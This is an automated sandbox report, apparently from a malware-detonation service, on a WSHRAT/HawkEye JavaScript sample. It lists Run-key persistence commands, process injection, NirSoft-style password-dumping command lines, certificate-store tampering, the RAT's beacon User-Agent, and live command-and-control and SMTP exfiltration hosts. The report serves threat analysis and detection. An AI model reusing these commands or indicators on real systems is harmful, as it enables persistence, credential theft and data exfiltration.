Malware Analysis Report

2025-04-14 08:28

Sample ID 210906-1z3k8sbeb3
Target 7002991002.js
SHA256 2a0356a320b8202a66e35e71cd8aa503953d8ddea284c0da06ae6f2571ec3ff5
Tags
hawkeye wshrat keylogger persistence spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

2a0356a320b8202a66e35e71cd8aa503953d8ddea284c0da06ae6f2571ec3ff5

Threat Level: Known bad

The file 7002991002.js was found to be: Known bad.

Malicious Activity Summary

hawkeye wshrat keylogger persistence spyware stealer trojan

WSHRAT

HawkEye

Nirsoft

NirSoft MailPassView

NirSoft WebBrowserPassView

Executes dropped EXE

Blocklisted process makes network request

Drops startup file

Uses the VBS compiler for execution

Loads dropped DLL

Adds Run key to start application

Looks up external IP address via web service

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Kills process with taskkill

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Script User-Agent

Modifies system certificate store

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-09-06 22:06

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2021-09-06 22:06

Reported

2021-09-06 22:08

Platform

win10-en

Max time kernel

153s

Max time network

160s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\7002991002.js

Signatures

HawkEye

keylogger trojan stealer spyware hawkeye

WSHRAT

trojan wshrat

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\whhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7002991002.js C:\Windows\system32\wscript.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7002991002.js C:\Windows\system32\wscript.exe N/A

Uses the VBS compiler for execution

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\software\microsoft\windows\currentversion\run C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\7002991002 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Local\\Temp\\7002991002.js\"" C:\Windows\system32\wscript.exe N/A
Key created \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7002991002 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Local\\Temp\\7002991002.js\"" C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsUpdate.exe" C:\Users\Admin\AppData\Roaming\Windows Update.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A whatismyipaddress.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3840 set thread context of 4128 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 3840 set thread context of 4184 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Enumerates physical storage devices

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Roaming\Windows Update.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Roaming\Windows Update.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d0030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Roaming\Windows Update.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa20f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Roaming\Windows Update.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000040000000100000010000000497904b0eb8719ac47b0bc11519b74d0030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d578112861900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Roaming\Windows Update.exe N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header WSHRAT|CE86B187|GSNTPAWQ|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 6/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|CE86B187|GSNTPAWQ|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 6/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|CE86B187|GSNTPAWQ|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 6/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|CE86B187|GSNTPAWQ|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 6/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|CE86B187|GSNTPAWQ|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 6/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|CE86B187|GSNTPAWQ|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 6/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|CE86B187|GSNTPAWQ|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 6/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|CE86B187|GSNTPAWQ|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 6/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|CE86B187|GSNTPAWQ|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 6/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|CE86B187|GSNTPAWQ|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 6/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|CE86B187|GSNTPAWQ|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 6/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|CE86B187|GSNTPAWQ|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 6/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|CE86B187|GSNTPAWQ|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 6/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|CE86B187|GSNTPAWQ|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 6/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|CE86B187|GSNTPAWQ|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 6/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|CE86B187|GSNTPAWQ|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 6/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|CE86B187|GSNTPAWQ|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 6/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|CE86B187|GSNTPAWQ|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 6/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|CE86B187|GSNTPAWQ|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 6/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|CE86B187|GSNTPAWQ|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 6/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|CE86B187|GSNTPAWQ|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 6/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header WSHRAT|CE86B187|GSNTPAWQ|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 6/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|CE86B187|GSNTPAWQ|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 6/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3908 wrote to memory of 3856 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\whhost.exe
PID 3908 wrote to memory of 3856 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\whhost.exe
PID 3908 wrote to memory of 3856 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\whhost.exe
PID 3856 wrote to memory of 3840 N/A C:\Users\Admin\AppData\Local\Temp\whhost.exe C:\Users\Admin\AppData\Roaming\Windows Update.exe
PID 3856 wrote to memory of 3840 N/A C:\Users\Admin\AppData\Local\Temp\whhost.exe C:\Users\Admin\AppData\Roaming\Windows Update.exe
PID 3856 wrote to memory of 3840 N/A C:\Users\Admin\AppData\Local\Temp\whhost.exe C:\Users\Admin\AppData\Roaming\Windows Update.exe
PID 3840 wrote to memory of 4128 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 3840 wrote to memory of 4128 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 3840 wrote to memory of 4128 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 3840 wrote to memory of 4128 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 3840 wrote to memory of 4128 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 3840 wrote to memory of 4128 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 3840 wrote to memory of 4128 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 3840 wrote to memory of 4128 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 3840 wrote to memory of 4128 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 3840 wrote to memory of 4184 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 3840 wrote to memory of 4184 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 3840 wrote to memory of 4184 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 3840 wrote to memory of 4184 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 3840 wrote to memory of 4184 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 3840 wrote to memory of 4184 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 3840 wrote to memory of 4184 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 3840 wrote to memory of 4184 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 3840 wrote to memory of 4184 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\7002991002.js

C:\Users\Admin\AppData\Local\Temp\whhost.exe

"C:\Users\Admin\AppData\Local\Temp\whhost.exe"

C:\Users\Admin\AppData\Roaming\Windows Update.exe

"C:\Users\Admin\AppData\Roaming\Windows Update.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"

Network

Country Destination Domain Proto
US 8.8.8.8:53 astatech-cn.com udp
GB 78.110.166.82:80 astatech-cn.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 159.89.232.243:7121 159.89.232.243 tcp
US 8.8.8.8:53 whatismyipaddress.com udp
US 104.16.154.36:80 whatismyipaddress.com tcp
US 8.8.8.8:53 mail.pharma-trade.org udp
BD 203.191.33.181:587 mail.pharma-trade.org tcp
US 159.89.232.243:7121 159.89.232.243 tcp
US 159.89.232.243:7121 159.89.232.243 tcp
US 159.89.232.243:7121 159.89.232.243 tcp
US 8.8.8.8:53 wshsoft.company udp
SG 194.59.164.67:80 wshsoft.company tcp
BD 203.191.33.181:587 mail.pharma-trade.org tcp
US 159.89.232.243:7121 159.89.232.243 tcp
US 159.89.232.243:7121 159.89.232.243 tcp
US 159.89.232.243:7121 159.89.232.243 tcp
US 159.89.232.243:7121 159.89.232.243 tcp
US 159.89.232.243:7121 159.89.232.243 tcp
US 159.89.232.243:7121 159.89.232.243 tcp
US 159.89.232.243:7121 159.89.232.243 tcp
US 159.89.232.243:7121 159.89.232.243 tcp
US 159.89.232.243:7121 159.89.232.243 tcp
US 159.89.232.243:7121 159.89.232.243 tcp
US 159.89.232.243:7121 159.89.232.243 tcp
US 159.89.232.243:7121 159.89.232.243 tcp
US 159.89.232.243:7121 159.89.232.243 tcp
US 159.89.232.243:7121 159.89.232.243 tcp
US 159.89.232.243:7121 159.89.232.243 tcp
US 159.89.232.243:7121 159.89.232.243 tcp
US 159.89.232.243:7121 159.89.232.243 tcp
